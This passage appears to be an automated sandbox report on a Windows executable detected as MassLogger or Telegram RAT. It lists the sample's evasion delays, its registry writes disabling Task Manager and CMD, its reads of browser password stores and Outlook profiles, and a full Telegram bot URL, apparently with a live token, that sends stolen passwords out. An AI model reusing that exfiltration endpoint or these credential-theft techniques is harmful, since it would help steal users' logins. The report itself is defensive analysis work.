Source: C:\Users\user\Desktop\grrezORe7h.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Memory allocated: 34560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Memory allocated: 36560000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597889	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596873	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595446	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 594578	Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe	Window / User API: threadDelayed 1704			Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Window / User API: threadDelayed 8152			Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\grrezORe7h.exe

API coverage: 2.9 %

Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7996	Thread sleep count: 1704 > 30	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7996	Thread sleep count: 8152 > 30	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -597889s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596873s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595446s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595124s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe TID: 7976	Thread sleep time: -594578s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405846
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 0_2_00406398 FindFirstFileW,FindClose,	0_2_00406398
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405846
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_00406398 FindFirstFileW,FindClose,	4_2_00406398

Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597889	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596873	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596219	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595446	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595124	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Thread delayed: delay time: 594578	Jump to behavior

Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0Edh

Source: C:\Users\user\Desktop\grrezORe7h.exe	API call chain: ExitProcess graph end node			graph_0-3943
Source: C:\Users\user\Desktop\grrezORe7h.exe	API call chain: ExitProcess graph end node			graph_0-3762

Source: C:\Users\user\Desktop\grrezORe7h.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\grrezORe7h.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe

Process created: C:\Users\user\Desktop\grrezORe7h.exe "C:\Users\user\Desktop\grrezORe7h.exe"

Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe	Queries volume information: C:\Users\user\Desktop\grrezORe7h.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe

Code function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406077

Source: C:\Users\user\Desktop\grrezORe7h.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Users\user\Desktop\grrezORe7h.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables CMD prompt

Source: C:\Users\user\Desktop\grrezORe7h.exe

Registry value created: DisableCMD 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Users\user\Desktop\grrezORe7h.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\grrezORe7h.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\grrezORe7h.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: grrezORe7h.exe PID: 7776, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	31 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
grrezORe7h.exe	55%	ReversingLabs	Win32.Ransomware.TelegramRAT
grrezORe7h.exe	68%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://api.telegram.orgFrH	0%	Avira URL Cloud	safe
http://checkip.dyndns.orgH	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.181.238	true	false	high
drive.usercontent.google.com	142.250.185.225	true	false	high
reallyfreegeoip.org	104.21.96.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org	grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034627000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000346FD000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003463C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	grrezORe7h.exe, 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382	grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgH	grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/S	grrezORe7h.exe, 00000004.00000003.2880307100.0000000036E5E000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmp	false		high
